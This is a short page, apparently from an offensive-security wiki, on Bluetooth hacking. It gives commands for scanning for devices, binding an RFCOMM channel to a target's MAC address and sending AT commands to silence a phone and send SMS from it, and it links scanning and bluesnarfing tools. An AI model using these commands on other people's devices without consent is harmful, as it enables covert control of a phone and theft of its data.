> For the complete documentation index, see [llms.txt](https://book.redsquad.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.redsquad.xyz/wireless-hacking/bluetooth.md).

# Bluetooth

{% embed url="<https://github.com/zedxpace/bluetooth-hacking->" %}
Bluetooth Hacking
{% endembed %}

## Basics

```bash
# scan peripherals
service bluetooth start
hcitool scan
# or
bluetoothctl scan on

# connect
rfcomm bind 0 $mac $channel_nb
rfcomm bind 0 $mac 6
# connect to the peripheral on channel 6

# AT terminal 
AT*ESIL=1 # activates silence mode
AT+CMGS="+336875648" # sends SMS

```

## Tools

{% embed url="<https://github.com/fO-000/bluescan>" %}

{% embed url="<https://github.com/kimbo/bluesnarfer>" %}
